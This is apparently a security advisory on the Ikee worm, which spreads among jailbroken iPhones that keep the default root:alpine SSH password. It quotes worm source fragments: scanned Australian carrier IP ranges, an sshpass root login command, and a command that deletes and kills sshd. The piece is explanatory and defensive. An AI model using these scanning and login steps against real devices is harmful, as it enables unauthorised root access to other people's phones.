A worm is currently spreading on jailbroken iPhones, exploiting the hardcoded root account exposed by the SSH server.

Jailbreaking an iPhone (or an iPod Touch) consists in getting out of the sandbox the user and his applications normally run into, so as to execute code as root and take complete control over the device. Once performed, installing packets is usually done via Cydia, a graphical packet management interface. Problems arise when the user decides to install an OpenSSH server, opening remote access to his device via hardcoded iPhone accounts, as the famous root:alpine.

The attack method is trivial: scan IP looking for opened 22/tcp ports, try to connect with SSH as root:alpine and execute your commands as root. Recently, a user in the Netherlands used this method to compromise iPhones and blackmailed the victims into paying 5 euros to secure their device (he now decided to stop and his web page only indicates how to remove his malicious application).

Then comes the Ikee worm, exploiting the same method. Its source code has been made public for a few hours but its access has now been suspended. Several variants are already spreading (four at time of writing).

To spread, Ikee uses several IP addresses generation methods:

• addresses "near" the IP address of the device it is currently running on

   char *locRanges = getAddrRange(); // NB: this function calls getifaddrs() to retrieve IP addresses for each interface
   char *lanRanges = "192.168.0.0-192.168.255.255";

• hardcoded ranges, mainly in Autralia (Vodaphone, Optus and Telstra operators)

   char *vodRanges1 = "202.81.64.0-202.81.79.255";
   char *vodRanges2 = "23.98.128.0-123.98.143.255";
   char *vodRanges3 = "120.16.0.0-120.23.255.255";
   char *optRanges1 = "114.72.0.0-114.75.255.255";
   char *optRanges2 = "203.2.75.0-203.2.75.255";
   char *optRanges3 = "210.49.0.0-210.49.255.255";
   char *optRanges4 = "203.17.140.0-203.17.140.255";
   char *optRanges5 = "203.17.138.0-203.17.138.255";
   char *optRanges6 = "211.28.0.0-211.31.255.255";
   char *telRanges = "58.160.0.0-58.175.255.25";

• random IP addresses

A device may only be infected by this particular worm if it has an Internet routable IP address. Once an opened 22/tcp port has been found, it attempts to connect as root:

asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'", VULN_PASS, host);

If it receives back a message containing 99, it means that the remote device is vulnerable and the worm proceeds with the infection procedure. Current variants are not really malicious and only change the background image used in lock mode to a picture of Rick Astley. The worm also terminates the OpenSSH service and even deletes the /usr/sbin/sshd binary, thus preventing another attacker or worm from exploiting the same weakness:

    if (!(in = popen("rm -f /usr/sbin/sshd; killall sshd", "r"))) {

Ironically enough, the device is more secure after its infection than before

Obviously, the recommendations here are not to jailbreak an iPhone containing sensitive data (such as a professional device), not to install an SSH server, or not to forget to change the root password.